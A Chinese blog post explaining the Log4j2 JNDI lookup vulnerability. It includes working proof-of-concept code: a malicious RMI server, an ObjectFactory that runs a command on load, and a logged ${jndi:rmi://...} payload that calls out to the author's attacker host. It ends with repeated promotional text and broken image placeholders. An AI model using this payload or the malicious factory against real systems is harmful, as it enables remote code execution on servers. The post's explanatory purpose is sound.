log4j2核弹级漏洞原理和分析，2024年最新招银网络科技 面经

这功能强大啊，我们用demo看一下：

public class Main {

private static final Logger logger = LogManager.getLogger();

public static void main(String[] args) {

String content = “world”;

logger.trace(“hello {}”,content);

//https://logging.apache.org/log4j/2.x/manual/lookups.html

String content2 = “${java:os}”;

logger.trace(“hello {}”,content2);

String content3 = “${java:vm}”;

logger.trace(“hello {}”,content3);

}

}

我们看下输出的结果：

2021-12-11 20:03:29.751 [main] TRACE [13] - hello world

2021-12-11 20:03:29.755 [main] TRACE [17] - hello Windows 10 10.0, architecture: amd64-64

2021-12-11 20:03:29.756 [main] TRACE [19] - hello Java HotSpot™ 64-Bit Server VM (build 25.261-b12, mixed mode)

从结果上可以看到，输出的并不是hello ${java:os}和hello ${java:vm}，而是当前服务的操作系统信息和虚拟机信息。其实如果仅仅是这样，那也算不上什么漏洞，只能说功能强大而已。

Jndi Lookup

但是，log4j2还支持了Jndi Lookup这就很要命了。为了观察这个问题，我们先启动个JNDI的服务看看

public class SimpleJndiServer {

public static void main(String[] args) {

try {

Registry registry = LocateRegistry.createRegistry(1099);

System.out.println(“create rmi 1099”);

Reference reference = new Reference(“com.skyline.log4j2.demo.jndi.JndiObj”, “com.skyline.log4j2.demo.jndi.JndiObj”, null);

ReferenceWrapper wrapper = new ReferenceWrapper(reference);

registry.bind(“demo”, wrapper);

} catch (RemoteException | NamingException | AlreadyBoundException e) {

e.printStackTrace();

}

}

}

public class JndiObj implements ObjectFactory {

static {

System.out.println(“this is JndiObj,i’m here!”);

try {

//打开远程链接

Runtime.getRuntime().exec(“mstsc”);

} catch (IOException e) {

e.printStackTrace();

}

}

private String name;

public String getName() {

return name;

}

public void setName(String name) {

this.name = name;

}

@Override

public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {

return new JndiObj();

}

@Override

public String toString() {

return “JndiObj{” +

“name='” + name + ‘’’ +

‘}’;

}

}

然后，我们再写日志

public class Main {

private static final Logger logger = LogManager.getLogger();

public static void main(String[] args) {

//JNDI注入参考链接

//https://blog.youkuaiyun.com/caiqiiqi/article/details/105976072

//192.168.31.13为客户端ip（攻击者ip），不是服务ip

System.setProperty(“com.sun.jndi.rmi.object.trustURLCodebase”, “true”);

String content4 = “${jndi:rmi://192.168.31.13:1099/demo}”;

logger.trace(“hello {}”,content4);

}

}

可以看到这次我日志中的内容变成了${jndi:rmi://192.168.31.13:1099/demo}，这里需要注意的是192.168.31.13是我的本机ip，也就是攻击者的ip。效果如下：

通过log4j2调用JNDI服务，我成功的打开了一个远程桌面。而且我写在JndiObj对象上的日志信息是输出在我的日志服务上的。也就是说，通过JNDI我（攻击者）成功的上传了自己的代码到用户服务中，这就很可怕了。

前面之所以打开的是远程桌面是因为在这里我是这么写的，但是，如果我写点别的呢？

很多时候我们记录在日志中的动态参数都是对象，这些对象可能是从前端或者别的服务请求过来的。比如一个登录接口，如果User对象中的userName的值就是我们上面写的${jndi:rmi://192.168.31.13:1099/demo}，那后果真的是不堪设想…所以说是核弹级漏洞，也不算过分。

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数Java工程师，想要提升技能，往往是自己摸索成长或者是报班学习，但对于培训机构动则几千的学费，着实压力不小。自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年Java开发全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Java开发知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加V获取：vip1024b （备注Java）

最后

Java架构进阶面试及知识点文档笔记

这份文档共498页，其中包括Java集合，并发编程，JVM，Dubbo,Redis，Spring全家桶，MySQL，Kafka等面试解析及知识点整理

Java分布式高级面试问题解析文档

其中都是包括分布式的面试问题解析，内容有分布式消息队列，Redis缓存，分库分表，微服务架构，分布式高可用，读写分离等等！

互联网Java程序员面试必备问题解析及文档学习笔记

Java架构进阶视频解析合集

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

664749)]

互联网Java程序员面试必备问题解析及文档学习笔记

[外链图片转存中…(img-u0a167go-1712655664750)]

Java架构进阶视频解析合集

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-7BPsptmK-1712655664750)]